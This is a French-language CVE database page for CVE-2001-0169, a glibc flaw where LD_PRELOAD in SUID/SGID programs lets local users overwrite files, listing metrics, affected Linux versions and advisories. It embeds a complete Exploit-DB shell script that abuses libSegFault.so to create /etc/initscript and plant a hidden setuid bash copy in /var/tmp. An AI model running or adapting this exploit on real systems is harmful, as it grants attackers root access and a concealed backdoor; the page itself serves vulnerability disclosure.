CVE-2001-0169 : Détail

CVE-2001-0169

0.04%V3
Local
2001-05-07
02h00 +00:00
2004-09-02
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

When using the LD_PRELOAD environmental variable in SUID or SGID applications, glibc does not verify that preloaded libraries in /etc/ld.so.cache are also SUID/SGID, which could allow a local user to overwrite arbitrary files by loading a library from /lib or /usr/lib.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 290

Date de publication : 2001-03-03 23h00 +00:00
Auteur : Shadow
EDB Vérifié : Yes

#!/bin/tcsh # przyklad wykorzystania dziury w LD_PRELOAD # shadow (tested on redhat 6.0, should work on others) if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LD_PRELOAD libSegFault.so setenv SEGFAULT_OUTPUT_NAME /etc/initscript echo czekaj... to moze chwile potrwac... while (! -e /etc/initscript ) ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null end echo utworzylem plik initscript cat > /etc/initscript << _init_ cp /bin/bash /var/tmp/.nothing chmod 6755 /var/tmp/.nothing rm /etc/initscript _init_ echo i nawet go podmienilem # milw0rm.com [2001-03-04]

Products Mentioned

Configuraton 0

Mandrakesoft>>Mandrake_linux >> Version 6.0

Mandrakesoft>>Mandrake_linux >> Version 6.1

Mandrakesoft>>Mandrake_linux >> Version 7.0

Mandrakesoft>>Mandrake_linux >> Version 7.1

Mandrakesoft>>Mandrake_linux >> Version 7.2

Mandrakesoft>>Mandrake_linux_corporate_server >> Version 1.0.1

Redhat>>Linux >> Version 6.0

    Redhat>>Linux >> Version 6.0

      Redhat>>Linux >> Version 6.0

        Redhat>>Linux >> Version 6.1

          Redhat>>Linux >> Version 6.1

            Redhat>>Linux >> Version 6.1

              Redhat>>Linux >> Version 6.2

                Redhat>>Linux >> Version 6.2

                  Redhat>>Linux >> Version 6.2

                    Trustix>>Secure_linux >> Version 1.1

                    Trustix>>Secure_linux >> Version 1.2

                    Turbolinux>>Turbolinux >> Version To (including) 6.0.5

                      Turbolinux>>Turbolinux >> Version 6.1

                        Références

                        http://www.debian.org/security/2001/dsa-039
                        Tags : vendor-advisory, x_refsource_DEBIAN
                        http://www.securityfocus.com/bid/2223
                        Tags : vdb-entry, x_refsource_BID
                        http://www.securityfocus.com/archive/1/157650
                        Tags : mailing-list, x_refsource_BUGTRAQ
                        http://www.redhat.com/support/errata/RHSA-2001-002.html
                        Tags : vendor-advisory, x_refsource_REDHAT